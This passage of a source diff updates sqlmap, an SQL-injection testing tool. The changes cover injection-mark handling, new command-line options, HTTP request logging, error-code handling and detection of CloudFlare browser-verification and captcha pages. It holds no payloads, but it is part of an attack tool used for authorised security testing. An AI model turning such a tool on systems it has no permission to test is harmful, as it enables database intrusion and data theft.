conf.httpHeaders[index] = (header, value.replace(CUSTOM_INJECTION_MARK_CHAR, ""))
|
||||
conf.paramDict[place]["%s #%d%s" % (header, i + 1, kb.customInjectionMark)] = "%s,%s" % (header, "".join("%s%s" % (parts[j], kb.customInjectionMark if i == j else "") for j in xrange(len(parts))))
|
||||
conf.httpHeaders[index] = (header, value.replace(kb.customInjectionMark, ""))
|
||||
else:
|
||||
parts = value.split(CUSTOM_INJECTION_MARK_CHAR)
|
||||
parts = value.split(kb.customInjectionMark)
|
||||
|
||||
for i in xrange(len(parts) - 1):
|
||||
name = None
|
||||
@@ -301,8 +313,8 @@ def _setRequestParams():
|
||||
name = "%s %s" % (kb.postHint, _)
|
||||
break
|
||||
if name is None:
|
||||
name = "%s#%s%s" % (("%s " % kb.postHint) if kb.postHint else "", i + 1, CUSTOM_INJECTION_MARK_CHAR)
|
||||
conf.paramDict[place][name] = "".join("%s%s" % (parts[j], CUSTOM_INJECTION_MARK_CHAR if i == j else "") for j in xrange(len(parts)))
|
||||
name = "%s#%s%s" % (("%s " % kb.postHint) if kb.postHint else "", i + 1, kb.customInjectionMark)
|
||||
conf.paramDict[place][name] = "".join("%s%s" % (parts[j], kb.customInjectionMark if i == j else "") for j in xrange(len(parts)))
|
||||
|
||||
if place == PLACE.URI and PLACE.GET in conf.paramDict:
|
||||
del conf.paramDict[PLACE.GET]
|
||||
@@ -314,7 +326,7 @@ def _setRequestParams():
|
||||
if kb.processUserMarks:
|
||||
for item in ("url", "data", "agent", "referer", "cookie"):
|
||||
if conf.get(item):
|
||||
conf[item] = conf[item].replace(CUSTOM_INJECTION_MARK_CHAR, "")
|
||||
conf[item] = conf[item].replace(kb.customInjectionMark, "")
|
||||
|
||||
# Perform checks on Cookie parameters
|
||||
if conf.cookie:
|
||||
@@ -363,8 +375,8 @@ def _setRequestParams():
|
||||
|
||||
if condition:
|
||||
conf.parameters[PLACE.CUSTOM_HEADER] = str(conf.httpHeaders)
|
||||
conf.paramDict[PLACE.CUSTOM_HEADER] = {httpHeader: "%s,%s%s" % (httpHeader, headerValue, CUSTOM_INJECTION_MARK_CHAR)}
|
||||
conf.httpHeaders = [(header, value.replace(CUSTOM_INJECTION_MARK_CHAR, "")) for header, value in conf.httpHeaders]
|
||||
conf.paramDict[PLACE.CUSTOM_HEADER] = {httpHeader: "%s,%s%s" % (httpHeader, headerValue, kb.customInjectionMark)}
|
||||
conf.httpHeaders = [(header, value.replace(kb.customInjectionMark, "")) for header, value in conf.httpHeaders]
|
||||
testableParameters = True
|
||||
|
||||
if not conf.parameters:
|
||||
@@ -390,7 +402,7 @@ def _setRequestParams():
|
||||
message += "Do you want sqlmap to automatically update it in further requests? [y/N] "
|
||||
|
||||
if readInput(message, default='N', boolean=True):
|
||||
conf.csrfToken = parameter
|
||||
conf.csrfToken = getUnicode(parameter)
|
||||
break
|
||||
|
||||
def _setHashDB():
|
||||
@@ -425,7 +437,7 @@ def _resumeHashDBValues():
|
||||
kb.xpCmdshellAvailable = hashDBRetrieve(HASHDB_KEYS.KB_XP_CMDSHELL_AVAILABLE) or kb.xpCmdshellAvailable
|
||||
|
||||
kb.errorChunkLength = hashDBRetrieve(HASHDB_KEYS.KB_ERROR_CHUNK_LENGTH)
|
||||
if kb.errorChunkLength and kb.errorChunkLength.isdigit():
|
||||
if isNumPosStrValue(kb.errorChunkLength):
|
||||
kb.errorChunkLength = int(kb.errorChunkLength)
|
||||
else:
|
||||
kb.errorChunkLength = None
|
||||
@@ -636,30 +648,31 @@ def _createTargetDirs():
|
||||
|
||||
conf.outputPath = os.path.join(getUnicode(paths.SQLMAP_OUTPUT_PATH), normalizeUnicode(getUnicode(conf.hostname)))
|
||||
|
||||
if not os.path.isdir(conf.outputPath):
|
||||
try:
|
||||
try:
|
||||
if not os.path.isdir(conf.outputPath):
|
||||
os.makedirs(conf.outputPath, 0755)
|
||||
except (OSError, IOError), ex:
|
||||
try:
|
||||
tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
|
||||
except Exception, _:
|
||||
errMsg = "unable to write to the temporary directory ('%s'). " % _
|
||||
errMsg += "Please make sure that your disk is not full and "
|
||||
errMsg += "that you have sufficient write permissions to "
|
||||
errMsg += "create temporary files and/or directories"
|
||||
raise SqlmapSystemException(errMsg)
|
||||
except (OSError, IOError, TypeError), ex:
|
||||
try:
|
||||
tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
|
||||
except Exception, _:
|
||||
errMsg = "unable to write to the temporary directory ('%s'). " % _
|
||||
errMsg += "Please make sure that your disk is not full and "
|
||||
errMsg += "that you have sufficient write permissions to "
|
||||
errMsg += "create temporary files and/or directories"
|
||||
raise SqlmapSystemException(errMsg)
|
||||
|
||||
warnMsg = "unable to create output directory "
|
||||
warnMsg += "'%s' (%s). " % (conf.outputPath, getUnicode(ex))
|
||||
warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir)
|
||||
logger.warn(warnMsg)
|
||||
warnMsg = "unable to create output directory "
|
||||
warnMsg += "'%s' (%s). " % (conf.outputPath, getUnicode(ex))
|
||||
warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir)
|
||||
logger.warn(warnMsg)
|
||||
|
||||
conf.outputPath = tempDir
|
||||
conf.outputPath = tempDir
|
||||
|
||||
try:
|
||||
with codecs.open(os.path.join(conf.outputPath, "target.txt"), "w+", UNICODE_ENCODING) as f:
|
||||
f.write(kb.originalUrls.get(conf.url) or conf.url or conf.hostname)
|
||||
f.write(" (%s)" % (HTTPMETHOD.POST if conf.data else HTTPMETHOD.GET))
|
||||
f.write(" # %s" % getUnicode(subprocess.list2cmdline(sys.argv), encoding=sys.stdin.encoding))
|
||||
if conf.data:
|
||||
f.write("\n\n%s" % getUnicode(conf.data))
|
||||
except IOError, ex:
|
||||
|
||||
@@ -31,7 +31,6 @@ from lib.core.settings import BASIC_HELP_ITEMS
|
||||
from lib.core.settings import DUMMY_URL
|
||||
from lib.core.settings import IS_WIN
|
||||
from lib.core.settings import MAX_HELP_OPTION_LENGTH
|
||||
from lib.core.settings import UNICODE_ENCODING
|
||||
from lib.core.settings import VERSION_STRING
|
||||
from lib.core.shell import autoCompletion
|
||||
from lib.core.shell import clearHistory
|
||||
@@ -48,7 +47,8 @@ def cmdLineParser(argv=None):
|
||||
|
||||
checkSystemEncoding()
|
||||
|
||||
_ = getUnicode(os.path.basename(argv[0]), encoding=sys.getfilesystemencoding() or UNICODE_ENCODING)
|
||||
# Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING")
|
||||
_ = getUnicode(os.path.basename(argv[0]), encoding=sys.stdin.encoding)
|
||||
|
||||
usage = "%s%s [options]" % ("python " if not IS_WIN else "", \
|
||||
"\"%s\"" % _ if " " in _ else _)
|
||||
@@ -149,8 +149,8 @@ def cmdLineParser(argv=None):
|
||||
request.add_option("--auth-file", dest="authFile",
|
||||
help="HTTP authentication PEM cert/private key file")
|
||||
|
||||
request.add_option("--ignore-401", dest="ignore401", action="store_true",
|
||||
help="Ignore HTTP Error 401 (Unauthorized)")
|
||||
request.add_option("--ignore-code", dest="ignoreCode", type="int",
|
||||
help="Ignore HTTP error code (e.g. 401)")
|
||||
|
||||
request.add_option("--ignore-proxy", dest="ignoreProxy", action="store_true",
|
||||
help="Ignore system default proxy settings")
|
||||
@@ -321,7 +321,7 @@ def cmdLineParser(argv=None):
|
||||
|
||||
detection.add_option("--risk", dest="risk", type="int",
|
||||
help="Risk of tests to perform (1-3, "
|
||||
"default %d)" % defaults.level)
|
||||
"default %d)" % defaults.risk)
|
||||
|
||||
detection.add_option("--string", dest="string",
|
||||
help="String to match when "
|
||||
@@ -617,9 +617,6 @@ def cmdLineParser(argv=None):
|
||||
general = OptionGroup(parser, "General", "These options can be used "
|
||||
"to set some general working parameters")
|
||||
|
||||
#general.add_option("-x", dest="xmlFile",
|
||||
# help="Dump the data into an XML file")
|
||||
|
||||
general.add_option("-s", dest="sessionFile",
|
||||
help="Load session from a stored (.sqlite) file")
|
||||
|
||||
@@ -634,8 +631,9 @@ def cmdLineParser(argv=None):
|
||||
general.add_option("--binary-fields", dest="binaryFields",
|
||||
help="Result fields having binary values (e.g. \"digest\")")
|
||||
|
||||
general.add_option("--charset", dest="charset",
|
||||
help="Force character encoding used for data retrieval")
|
||||
general.add_option("--check-internet", dest="checkInternet",
|
||||
action="store_true",
|
||||
help="Check Internet connection before assessing the target")
|
||||
|
||||
general.add_option("--crawl", dest="crawlDepth", type="int",
|
||||
help="Crawl the website starting from the target URL")
|
||||
@@ -647,13 +645,18 @@ def cmdLineParser(argv=None):
|
||||
help="Delimiting character used in CSV output "
|
||||
"(default \"%s\")" % defaults.csvDel)
|
||||
|
||||
general.add_option("--charset", dest="charset",
|
||||
help="Blind SQL injection charset (e.g. \"0123456789abcdef\")")
|
||||
|
||||
general.add_option("--dump-format", dest="dumpFormat",
|
||||
help="Format of dumped data (CSV (default), HTML or SQLITE)")
|
||||
|
||||
general.add_option("--encoding", dest="encoding",
|
||||
help="Character encoding used for data retrieval (e.g. GBK)")
|
||||
|
||||
general.add_option("--eta", dest="eta",
|
||||
action="store_true",
|
||||
help="Display for each output the "
|
||||
"estimated time of arrival")
|
||||
help="Display for each output the estimated time of arrival")
|
||||
|
||||
general.add_option("--flush-session", dest="flushSession",
|
||||
action="store_true",
|
||||
@@ -667,6 +670,9 @@ def cmdLineParser(argv=None):
|
||||
action="store_true",
|
||||
help="Ignore query results stored in session file")
|
||||
|
||||
general.add_option("--har", dest="harFile",
|
||||
help="Log all HTTP traffic into a HAR file")
|
||||
|
||||
general.add_option("--hex", dest="hexConvert",
|
||||
action="store_true",
|
||||
help="Use DBMS hex function(s) for data retrieval")
|
||||
@@ -779,6 +785,9 @@ def cmdLineParser(argv=None):
|
||||
parser.add_option("--profile", dest="profile", action="store_true",
|
||||
help=SUPPRESS_HELP)
|
||||
|
||||
parser.add_option("--force-dbms", dest="forceDbms",
|
||||
help=SUPPRESS_HELP)
|
||||
|
||||
parser.add_option("--force-dns", dest="forceDns", action="store_true",
|
||||
help=SUPPRESS_HELP)
|
||||
|
||||
@@ -844,8 +853,9 @@ def cmdLineParser(argv=None):
|
||||
advancedHelp = True
|
||||
extraHeaders = []
|
||||
|
||||
# Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING")
|
||||
for arg in argv:
|
||||
_.append(getUnicode(arg, encoding=sys.getfilesystemencoding() or UNICODE_ENCODING))
|
||||
_.append(getUnicode(arg, encoding=sys.stdin.encoding))
|
||||
|
||||
argv = _
|
||||
checkDeprecatedOptions(argv)
|
||||
|
||||
@@ -23,11 +23,10 @@ def headersParser(headers):
|
||||
|
||||
if not kb.headerPaths:
|
||||
kb.headerPaths = {
|
||||
"cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "cookie.xml"),
|
||||
"microsoftsharepointteamservices": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "sharepoint.xml"),
|
||||
"server": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "server.xml"),
|
||||
"servlet-engine": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "servlet.xml"),
|
||||
"set-cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "cookie.xml"),
|
||||
"servlet-engine": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "servlet-engine.xml"),
|
||||
"set-cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "set-cookie.xml"),
|
||||
"x-aspnet-version": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-aspnet-version.xml"),
|
||||
"x-powered-by": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-powered-by.xml"),
|
||||
}
|
||||
|
||||
@@ -46,7 +46,7 @@ from lib.utils.htmlentities import htmlEntities
|
||||
from thirdparty.chardet import detect
|
||||
from thirdparty.odict.odict import OrderedDict
|
||||
|
||||
def forgeHeaders(items=None):
|
||||
def forgeHeaders(items=None, base=None):
|
||||
"""
|
||||
Prepare HTTP Cookie, HTTP User-Agent and HTTP Referer headers to use when performing
|
||||
the HTTP requests
|
||||
@@ -58,7 +58,7 @@ def forgeHeaders(items=None):
|
||||
if items[_] is None:
|
||||
del items[_]
|
||||
|
||||
headers = OrderedDict(conf.httpHeaders)
|
||||
headers = OrderedDict(base or conf.httpHeaders)
|
||||
headers.update(items.items())
|
||||
|
||||
class _str(str):
|
||||
@@ -95,7 +95,7 @@ def forgeHeaders(items=None):
|
||||
if cookie.domain_specified and not conf.hostname.endswith(cookie.domain):
|
||||
continue
|
||||
|
||||
if ("%s=" % getUnicode(cookie.name)) in headers[HTTP_HEADER.COOKIE]:
|
||||
if ("%s=" % getUnicode(cookie.name)) in getUnicode(headers[HTTP_HEADER.COOKIE]):
|
||||
if conf.loadCookies:
|
||||
conf.httpHeaders = filter(None, ((item if item[0] != HTTP_HEADER.COOKIE else None) for item in conf.httpHeaders))
|
||||
elif kb.mergeCookies is None:
|
||||
@@ -123,7 +123,7 @@ def forgeHeaders(items=None):
|
||||
|
||||
return headers
|
||||
|
||||
def parseResponse(page, headers):
|
||||
def parseResponse(page, headers, status=None):
|
||||
"""
|
||||
@param page: the page to parse to feed the knowledge base htmlFp
|
||||
(back-end DBMS fingerprint based upon DBMS error messages return
|
||||
@@ -135,7 +135,7 @@ def parseResponse(page, headers):
|
||||
headersParser(headers)
|
||||
|
||||
if page:
|
||||
htmlParser(page)
|
||||
htmlParser(page if not status else "%s\n\n%s" % (status, page))
|
||||
|
||||
@cachedmethod
|
||||
def checkCharEncoding(encoding, warn=True):
|
||||
@@ -155,7 +155,7 @@ def checkCharEncoding(encoding, warn=True):
|
||||
return encoding
|
||||
|
||||
# Reference: http://www.destructor.de/charsets/index.htm
|
||||
translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"}
|
||||
translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "iso-8859-0": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"}
|
||||
|
||||
for delimiter in (';', ',', '('):
|
||||
if delimiter in encoding:
|
||||
@@ -204,7 +204,7 @@ def checkCharEncoding(encoding, warn=True):
|
||||
# Reference: http://philip.html5.org/data/charsets-2.html
|
||||
if encoding in translate:
|
||||
encoding = translate[encoding]
|
||||
elif encoding in ("null", "{charset}", "*") or not re.search(r"\w", encoding):
|
||||
elif encoding in ("null", "{charset}", "charset", "*") or not re.search(r"\w", encoding):
|
||||
return None
|
||||
|
||||
# Reference: http://www.iana.org/assignments/character-sets
|
||||
@@ -279,7 +279,7 @@ def decodePage(page, contentEncoding, contentType):
|
||||
kb.pageCompress = False
|
||||
raise SqlmapCompressionException
|
||||
|
||||
if not conf.charset:
|
||||
if not conf.encoding:
|
||||
httpCharset, metaCharset = None, None
|
||||
|
||||
# Reference: http://stackoverflow.com/questions/1020892/python-urllib2-read-to-unicode
|
||||
@@ -296,7 +296,7 @@ def decodePage(page, contentEncoding, contentType):
|
||||
else:
|
||||
kb.pageEncoding = None
|
||||
else:
|
||||
kb.pageEncoding = conf.charset
|
||||
kb.pageEncoding = conf.encoding
|
||||
|
||||
# can't do for all responses because we need to support binary files too
|
||||
if contentType and not isinstance(page, unicode) and "text/" in contentType.lower():
|
||||
@@ -340,12 +340,12 @@ def decodePage(page, contentEncoding, contentType):
|
||||
|
||||
return page
|
||||
|
||||
def processResponse(page, responseHeaders):
|
||||
def processResponse(page, responseHeaders, status=None):
|
||||
kb.processResponseCounter += 1
|
||||
|
||||
page = page or ""
|
||||
|
||||
parseResponse(page, responseHeaders if kb.processResponseCounter < PARSE_HEADERS_LIMIT else None)
|
||||
parseResponse(page, responseHeaders if kb.processResponseCounter < PARSE_HEADERS_LIMIT else None, status)
|
||||
|
||||
if not kb.tableFrom and Backend.getIdentifiedDbms() in (DBMS.ACCESS,):
|
||||
kb.tableFrom = extractRegexResult(SELECT_FROM_TABLE_REGEX, page)
|
||||
@@ -375,6 +375,13 @@ def processResponse(page, responseHeaders):
|
||||
conf.paramDict[PLACE.POST][name] = value
|
||||
conf.parameters[PLACE.POST] = re.sub("(?i)(%s=)[^&]+" % re.escape(name), r"\g<1>%s" % re.escape(value), conf.parameters[PLACE.POST])
|
||||
|
||||
if not kb.browserVerification and re.search(r"(?i)browser.?verification", page or ""):
|
||||
kb.browserVerification = True
|
||||
warnMsg = "potential browser verification protection mechanism detected"
|
||||
if re.search(r"(?i)CloudFlare", page):
|
||||
warnMsg += " (CloudFlare)"
|
||||
singleTimeWarnMessage(warnMsg)
|
||||
|
||||
if not kb.captchaDetected and re.search(r"(?i)captcha", page or ""):
|
||||
for match in re.finditer(r"(?si)<form.+?</form>", page):
|
||||
if re.search(r"(?i)captcha", match.group(0)):
|
||||
|
||||
@@ -81,7 +81,6 @@ from lib.core.exception import SqlmapTokenException
|
||||
from lib.core.exception import SqlmapValueException
|
||||
from lib.core.settings import ASTERISK_MARKER
|
||||
from lib.core.settings import BOUNDARY_BACKSLASH_MARKER
|
||||
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
|
||||
from lib.core.settings import DEFAULT_CONTENT_TYPE
|
||||
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
|
||||
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
||||
@@ -105,6 +104,7 @@ from lib.core.settings import RANDOM_STRING_MARKER
|
||||
from lib.core.settings import REPLACEMENT_MARKER
|
||||
from lib.core.settings import TEXT_CONTENT_TYPE_REGEX
|
||||
from lib.core.settings import UNENCODED_ORIGINAL_VALUE
|
||||
from lib.core.settings import UNICODE_ENCODING
|
||||
from lib.core.settings import URI_HTTP_HEADER
|
||||
from lib.core.settings import WARN_TIME_STDEV
|
||||
from lib.request.basic import decodePage
|
||||
@@ -222,6 +222,8 @@ class Connect(object):
|
||||
the target URL page content
|
||||
"""
|
||||
|
||||
start = time.time()
|
||||
|
||||
if isinstance(conf.delay, (int, float)) and conf.delay > 0:
|
||||
time.sleep(conf.delay)
|
||||
|
||||
@@ -256,6 +258,7 @@ class Connect(object):
|
||||
refreshing = kwargs.get("refreshing", False)
|
||||
retrying = kwargs.get("retrying", False)
|
||||
crawling = kwargs.get("crawling", False)
|
||||
checking = kwargs.get("checking", False)
|
||||
skipRead = kwargs.get("skipRead", False)
|
||||
|
||||
if multipart:
|
||||
@@ -277,13 +280,17 @@ class Connect(object):
|
||||
# url splitted with space char while urlencoding it in the later phase
|
||||
url = url.replace(" ", "%20")
|
||||
|
||||
if "://" not in url:
|
||||
url = "http://%s" % url
|
||||
|
||||
conn = None
|
||||
code = None
|
||||
page = None
|
||||
code = None
|
||||
status = None
|
||||
|
||||
_ = urlparse.urlsplit(url)
|
||||
requestMsg = u"HTTP request [#%d]:\n%s " % (threadData.lastRequestUID, method or (HTTPMETHOD.POST if post is not None else HTTPMETHOD.GET))
|
||||
requestMsg += ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else "")) if not any((refreshing, crawling)) else url
|
||||
requestMsg = u"HTTP request [#%d]:\r\n%s " % (threadData.lastRequestUID, method or (HTTPMETHOD.POST if post is not None else HTTPMETHOD.GET))
|
||||
requestMsg += getUnicode(("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else "")) if not any((refreshing, crawling, checking)) else url)
|
||||
responseMsg = u"HTTP response "
|
||||
requestHeaders = u""
|
||||
responseHeaders = None
|
||||
@@ -305,7 +312,7 @@ class Connect(object):
|
||||
params = urlencode(params)
|
||||
url = "%s?%s" % (url, params)
|
||||
|
||||
elif any((refreshing, crawling)):
|
||||
elif any((refreshing, crawling, checking)):
|
||||
pass
|
||||
|
||||
elif target:
|
||||
@@ -377,11 +384,7 @@ class Connect(object):
|
||||
headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie})
|
||||
|
||||
if auxHeaders:
|
||||
for key, value in auxHeaders.items():
|
||||
for _ in headers.keys():
|
||||
if _.upper() == key.upper():
|
||||
del headers[_]
|
||||
headers[key] = value
|
||||
headers = forgeHeaders(auxHeaders, headers)
|
||||
|
||||
for key, value in headers.items():
|
||||
del headers[key]
|
||||
@@ -407,13 +410,13 @@ class Connect(object):
|
||||
responseHeaders = _(ws.getheaders())
|
||||
responseHeaders.headers = ["%s: %s\r\n" % (_[0].capitalize(), _[1]) for _ in responseHeaders.items()]
|
||||
|
||||
requestHeaders += "\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()])
|
||||
requestMsg += "\n%s" % requestHeaders
|
||||
requestHeaders += "\r\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()])
|
||||
requestMsg += "\r\n%s" % requestHeaders
|
||||
|
||||
if post is not None:
|
||||
requestMsg += "\n\n%s" % getUnicode(post)
|
||||
requestMsg += "\r\n\r\n%s" % getUnicode(post)
|
||||
|
||||
requestMsg += "\n"
|
||||
requestMsg += "\r\n"
|
||||
|
||||
threadData.lastRequestMsg = requestMsg
|
||||
|
||||
@@ -426,26 +429,26 @@ class Connect(object):
|
||||
else:
|
||||
req = urllib2.Request(url, post, headers)
|
||||
|
||||
requestHeaders += "\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in req.header_items()])
|
||||
requestHeaders += "\r\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in req.header_items()])
|
||||
|
||||
if not getRequestHeader(req, HTTP_HEADER.COOKIE) and conf.cj:
|
||||
conf.cj._policy._now = conf.cj._now = int(time.time())
|
||||
cookies = conf.cj._cookies_for_request(req)
|
||||
requestHeaders += "\n%s" % ("Cookie: %s" % ";".join("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value)) for cookie in cookies))
|
||||
requestHeaders += "\r\n%s" % ("Cookie: %s" % ";".join("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value)) for cookie in cookies))
|
||||
|
||||
if post is not None:
|
||||
if not getRequestHeader(req, HTTP_HEADER.CONTENT_LENGTH):
|
||||
requestHeaders += "\n%s: %d" % (string.capwords(HTTP_HEADER.CONTENT_LENGTH), len(post))
|
||||
requestHeaders += "\r\n%s: %d" % (string.capwords(HTTP_HEADER.CONTENT_LENGTH), len(post))
|
||||
|
||||
if not getRequestHeader(req, HTTP_HEADER.CONNECTION):
|
||||
requestHeaders += "\n%s: %s" % (HTTP_HEADER.CONNECTION, "close" if not conf.keepAlive else "keep-alive")
|
||||
requestHeaders += "\r\n%s: %s" % (HTTP_HEADER.CONNECTION, "close" if not conf.keepAlive else "keep-alive")
|
||||
|
||||
requestMsg += "\n%s" % requestHeaders
|
||||
requestMsg += "\r\n%s" % requestHeaders
|
||||
|
||||
if post is not None:
|
||||
requestMsg += "\n\n%s" % getUnicode(post)
|
||||
requestMsg += "\r\n\r\n%s" % getUnicode(post)
|
||||
|
||||
requestMsg += "\n"
|
||||
requestMsg += "\r\n"
|
||||
|
||||
if not multipart:
|
||||
threadData.lastRequestMsg = requestMsg
|
||||
@@ -539,10 +542,22 @@ class Connect(object):
|
||||
warnMsg = "problem occurred during connection closing ('%s')" % getSafeExString(ex)
|
||||
logger.warn(warnMsg)
|
||||
|
||||
except SqlmapConnectionException, ex:
|
||||
if conf.proxyList and not kb.threadException:
|
||||
warnMsg = "unable to connect to the target URL ('%s')" % ex
|
||||
logger.critical(warnMsg)
|
||||
threadData.retriesCount = conf.retries
|
||||
return Connect._retryProxy(**kwargs)
|
||||
else:
|
||||
raise
|
||||
|
||||
except urllib2.HTTPError, ex:
|
||||
page = None
|
||||
responseHeaders = None
|
||||
|
||||
if checking:
|
||||
return None, None, None
|
||||
|
||||
try:
|
||||
page = ex.read() if not skipRead else None
|
||||
responseHeaders = ex.info()
|
||||
@@ -561,63 +576,65 @@ class Connect(object):
|
||||
page = page if isinstance(page, unicode) else getUnicode(page)
|
||||
|
||||
code = ex.code
|
||||
status = getUnicode(ex.msg)
|
||||
|
||||
kb.originalCode = kb.originalCode or code
|
||||
threadData.lastHTTPError = (threadData.lastRequestUID, code)
|
||||
threadData.lastHTTPError = (threadData.lastRequestUID, code, status)
|
||||
kb.httpErrorCodes[code] = kb.httpErrorCodes.get(code, 0) + 1
|
||||
|
||||
status = getUnicode(ex.msg)
|
||||
responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status)
|
||||
responseMsg += "[#%d] (%d %s):\r\n" % (threadData.lastRequestUID, code, status)
|
||||
|
||||
if responseHeaders:
|
||||
logHeaders = "\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()])
|
||||
logHeaders = "\r\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()])
|
||||
|
||||
logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]))
|
||||
logHTTPTraffic(requestMsg, "%s%s\r\n\r\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]), start, time.time())
|
||||
|
||||
skipLogTraffic = True
|
||||
|
||||
if conf.verbose <= 5:
|
||||
responseMsg += getUnicode(logHeaders)
|
||||
elif conf.verbose > 5:
|
||||
responseMsg += "%s\n\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])
|
||||
responseMsg += "%s\r\n\r\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])
|
||||
|
||||
if not multipart:
|
||||
logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg)
|
||||
|
||||
if ex.code == httplib.UNAUTHORIZED and not conf.ignore401:
|
||||
errMsg = "not authorized, try to provide right HTTP "
|
||||
errMsg += "authentication type and valid credentials (%d)" % code
|
||||
raise SqlmapConnectionException(errMsg)
|
||||
elif ex.code == httplib.NOT_FOUND:
|
||||
if raise404:
|
||||
errMsg = "page not found (%d)" % code
|
||||
if ex.code != conf.ignoreCode:
|
||||
if ex.code == httplib.UNAUTHORIZED:
|
||||
errMsg = "not authorized, try to provide right HTTP "
|
||||
errMsg += "authentication type and valid credentials (%d)" % code
|
||||
raise SqlmapConnectionException(errMsg)
|
||||
else:
|
||||
debugMsg = "page not found (%d)" % code
|
||||
singleTimeLogMessage(debugMsg, logging.DEBUG)
|
||||
processResponse(page, responseHeaders)
|
||||
elif ex.code == httplib.GATEWAY_TIMEOUT:
|
||||
if ignoreTimeout:
|
||||
return None if not conf.ignoreTimeouts else "", None, None
|
||||
else:
|
||||
warnMsg = "unable to connect to the target URL (%d - %s)" % (ex.code, httplib.responses[ex.code])
|
||||
if threadData.retriesCount < conf.retries and not kb.threadException:
|
||||
warnMsg += ". sqlmap is going to retry the request"
|
||||
logger.critical(warnMsg)
|
||||
return Connect._retryProxy(**kwargs)
|
||||
elif kb.testMode:
|
||||
logger.critical(warnMsg)
|
||||
return None, None, None
|
||||
elif ex.code == httplib.NOT_FOUND:
|
||||
if raise404:
|
||||
errMsg = "page not found (%d)" % code
|
||||
raise SqlmapConnectionException(errMsg)
|
||||
else:
|
||||
raise SqlmapConnectionException(warnMsg)
|
||||
else:
|
||||
debugMsg = "got HTTP error code: %d (%s)" % (code, status)
|
||||
logger.debug(debugMsg)
|
||||
debugMsg = "page not found (%d)" % code
|
||||
singleTimeLogMessage(debugMsg, logging.DEBUG)
|
||||
elif ex.code == httplib.GATEWAY_TIMEOUT:
|
||||
if ignoreTimeout:
|
||||
return None if not conf.ignoreTimeouts else "", None, None
|
||||
else:
|
||||
warnMsg = "unable to connect to the target URL (%d - %s)" % (ex.code, httplib.responses[ex.code])
|
||||
if threadData.retriesCount < conf.retries and not kb.threadException:
|
||||
warnMsg += ". sqlmap is going to retry the request"
|
||||
logger.critical(warnMsg)
|
||||
return Connect._retryProxy(**kwargs)
|
||||
elif kb.testMode:
|
||||
logger.critical(warnMsg)
|
||||
return None, None, None
|
||||
else:
|
||||
raise SqlmapConnectionException(warnMsg)
|
||||
else:
|
||||
debugMsg = "got HTTP error code: %d (%s)" % (code, status)
|
||||
logger.debug(debugMsg)
|
||||
|
||||
except (urllib2.URLError, socket.error, socket.timeout, httplib.HTTPException, struct.error, binascii.Error, ProxyError, SqlmapCompressionException, WebSocketException, TypeError):
|
||||
except (urllib2.URLError, socket.error, socket.timeout, httplib.HTTPException, struct.error, binascii.Error, ProxyError, SqlmapCompressionException, WebSocketException, TypeError, ValueError):
|
||||
tbMsg = traceback.format_exc()
|
||||
|
||||
if "no host given" in tbMsg:
|
||||
if checking:
|
||||
return None, None, None
|
||||
elif "no host given" in tbMsg:
|
||||
warnMsg = "invalid URL address used (%s)" % repr(url)
|
||||
raise SqlmapSyntaxException(warnMsg)
|
||||
elif "forcibly closed" in tbMsg or "Connection is already closed" in tbMsg:
|
||||
@@ -632,6 +649,7 @@ class Connect(object):
|
||||
|
||||
